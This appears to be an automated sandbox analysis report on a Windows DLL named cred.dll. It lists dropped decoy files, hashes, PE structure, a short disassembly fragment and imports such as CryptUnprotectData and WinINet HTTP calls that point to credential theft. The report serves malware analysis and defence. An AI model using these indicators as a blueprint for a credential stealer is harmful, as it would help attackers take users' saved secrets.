                                      Preview:NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

                                      C:\Users\user\AppData\Local\Temp\_Files_\QCFWYSKMHA.xlsx

                                      Download File
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.702247102869977
                                      Encrypted:false
                                      SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                      MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                      SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                      SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                      SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                      Malicious:false
                                      Preview:QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

                                      C:\Users\user\AppData\Local\Temp\_Files_\SFPUSAFIOL.docx

                                      Download File
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.696913287597031
                                      Encrypted:false
                                      SSDEEP:24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
                                      MD5:44ECF9E98785299129B35CBDBCAB909B
                                      SHA1:4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
                                      SHA-256:06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
                                      SHA-512:1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
                                      Malicious:false
                                      Preview:SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1qy02p2n.bzw.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2evaj5jk.bwg.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ldsdrso.ekt.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cq1100kn.xct.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffvc0doo.dfx.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fi0ciawq.ibq.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gj2hi0gy.env.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuyc43gd.ltg.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0ltpfm3.4ix.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oppjsqio.so4.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2mnxoxz.5js.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdcomyrd.hsb.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      Static File Info

                                      General

                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.685760265414563
                                      TrID:
                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                      • DOS Executable Generic (2002/1) 0.20%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:cred.dll
                                      File size:1'087'488 bytes
                                      MD5:fd8df0fc2168cb8c7959afaffa4d8031
                                      SHA1:1715f77ca9c2d09d3fbbd5e42ae506be4157d961
                                      SHA256:50f6ef79d5f5ba167a875bbf1438b8ff42a46ac5537127bb5a51f87bdc611620
                                      SHA512:4a856f62f1c1a63457c4c114f9141c2ddc626c3c63e40dbac3053052dd23578e7c8abcff63195e30d5c5e7d336b4ce256a8ed56b516b2ca2052be5dd292f4c24
                                      SSDEEP:24576:QWBhVxYlZdJCTgmP/xEcCJnDOEl5woFNEa1mXu5iPajrVT1jH:QWBhPYrpoCpmX2pjXjH
                                      TLSH:E6357D06FA52D071D8D420B112B7BBF2597C6539A72445DBAB801FB69D201F33E36B2E
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P.hv...%...%...%...$...%...$...%...$...%F..$V..%F..$...%F..$...%...$...%...%...%...$...%...$...%...%...%...$...%Rich...%.......

                                      File Icon

                                      Icon Hash:7ae282899bbab082

                                      Static PE Info

                                      General

                                      Entrypoint:0x100bfd9d
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x10000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x6750AA7C [Wed Dec 4 19:16:12 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:aca6f08ee5befa37be16bac4bc315573

                                      Entrypoint Preview

                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      cmp dword ptr [ebp+0Ch], 01h
                                      jne 00007F8EBC8C75D7h
                                      call 00007F8EBC8C79BCh
                                      push dword ptr [ebp+10h]
                                      push dword ptr [ebp+0Ch]
                                      push dword ptr [ebp+08h]
                                      call 00007F8EBC8C7483h
                                      add esp, 0Ch
                                      pop ebp
                                      retn 000Ch
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 100E758Ch
                                      mov dword ptr [ecx], 100E7584h
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      lea ecx, dword ptr [ebp-0Ch]
                                      call 00007F8EBC8C75AFh
                                      push 100FF94Ch
                                      lea eax, dword ptr [ebp-0Ch]
                                      push eax
                                      call 00007F8EBC8C93EFh
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      and dword ptr [10105024h], 00000000h
                                      sub esp, 24h
                                      or dword ptr [1010200Ch], 01h
                                      push 0000000Ah
                                      call dword ptr [100E7200h]
                                      test eax, eax
                                      je 00007F8EBC8C777Fh
                                      and dword ptr [ebp-10h], 00000000h
                                      xor eax, eax
                                      push ebx
                                      push esi
                                      push edi
                                      xor ecx, ecx
                                      lea edi, dword ptr [ebp-24h]
                                      push ebx
                                      cpuid
                                      mov esi, ebx
                                      pop ebx
                                      mov dword ptr [edi], eax
                                      mov dword ptr [edi+04h], esi
                                      mov dword ptr [edi+08h], ecx
                                      xor ecx, ecx
                                      mov dword ptr [edi+0Ch], edx
                                      mov eax, dword ptr [ebp-24h]
                                      mov edi, dword ptr [ebp-1Ch]
                                      mov dword ptr [ebp-0Ch], eax
                                      xor edi, 6C65746Eh
                                      mov eax, dword ptr [ebp-18h]
                                      xor eax, 49656E69h
                                      mov dword ptr [ebp-08h], eax
                                      mov eax, dword ptr [ebp-20h]
                                      xor eax, 756E6547h
                                      mov dword ptr [ebp-04h], eax
                                      xor eax, eax
                                      inc eax
                                      push ebx
                                      cpuid

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1002b00x58.rdata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1003080x8c.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x10b0000xf8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x10c0000x6690.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xfe2200x38.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfe2580x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0xe70000x2f0.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000xe54780xe56006459ce3e8dab0c0f9a8d9b32582fa649False0.48708595878746597data6.620598152229375IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0xe70000x1a4620x1a600f37d9589b61c9372dce1e703c33ec81bFalse0.4942702162322275data5.994296048025553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x1020000x8f8c0x2e00cab1fb9c909133804e55f94108a6d406False0.16525135869565216data2.7513977064678916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x10b0000xf80x200a9a28dcf81ea8b2bbb0c1083475755c2False0.3359375data2.5312981004807127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x10c0000x66900x68006e4dc0f9f380031dd089a15a86a70e3aFalse0.7274639423076923data6.65509143676354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_MANIFEST0x10b0600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793

                                      Imports

                                      DLLImport
                                      CRYPT32.dllCryptUnprotectData
                                      KERNEL32.dllGetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, WaitForSingleObject, CreateFileW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, MultiByteToWideChar, Sleep, GetTempPathA, FormatMessageW, GetDiskFreeSpaceA, GetLastError, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, CloseHandle, GetSystemInfo, LoadLibraryW, HeapAlloc, HeapCompact, HeapDestroy, UnlockFile, GetProcAddress, CreateFileMappingA, LocalFree, LockFileEx, GetFileSize, DeleteCriticalSection, GetCurrentProcessId, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, WideCharToMultiByte, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, CreateFileMappingW, MapViewOfFile, QueryPerformanceCounter, GetTickCount, FlushFileBuffers, SetHandleInformation, FindFirstFileA, Wow64DisableWow64FsRedirection, K32GetModuleFileNameExW, FindNextFileA, CreatePipe, PeekNamedPipe, lstrlenA, FindClose, GetCurrentDirectoryA, lstrcatA, OpenProcess, SetCurrentDirectoryA, CreateToolhelp32Snapshot, ProcessIdToSessionId, CopyFileA, Wow64RevertWow64FsRedirection, Process32NextW, Process32FirstW, CreateThread, CreateProcessA, CreateDirectoryA, ReadConsoleW, InitializeCriticalSection, LeaveCriticalSection, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, GetFullPathNameW, EnterCriticalSection, HeapFree, HeapCreate, TryEnterCriticalSection, ReadFile, AreFileApisANSI, SetFilePointer, SetFilePointerEx, GetFileSizeEx, GetConsoleMode, GetConsoleOutputCP, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetStdHandle, GetCurrentDirectoryW, GetStdHandle, GetTimeZoneInformation, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InitializeSListHead, LCMapStringEx, InitializeCriticalSectionEx, EncodePointer, DecodePointer, CompareStringEx, GetCPInfo, GetStringTypeW, RaiseException, InterlockedFlushSList, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ExitProcess, GetModuleFileNameW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, WriteConsoleW
                                      ADVAPI32.dllGetSidSubAuthority, RegEnumValueW, RegEnumKeyA, RegCloseKey, RegQueryInfoKeyW, RegOpenKeyA, RegQueryValueExA, GetSidSubAuthorityCount, RegOpenKeyExA, GetUserNameA, RegEnumKeyExW, LookupAccountNameA, GetSidIdentifierAuthority
                                      SHELL32.dllSHFileOperationA, SHGetFolderPathA
                                      WININET.dllHttpOpenRequestA, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, HttpAddRequestHeadersA, HttpSendRequestExW, HttpEndRequestA, InternetOpenW, InternetWriteFile
                                      bcrypt.dllBCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptGenerateSymmetricKey, BCryptDecrypt

                                      Exports

                                      NameOrdinalAddress
                                      Main10x100b2050
                                      Save20x100045c0

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
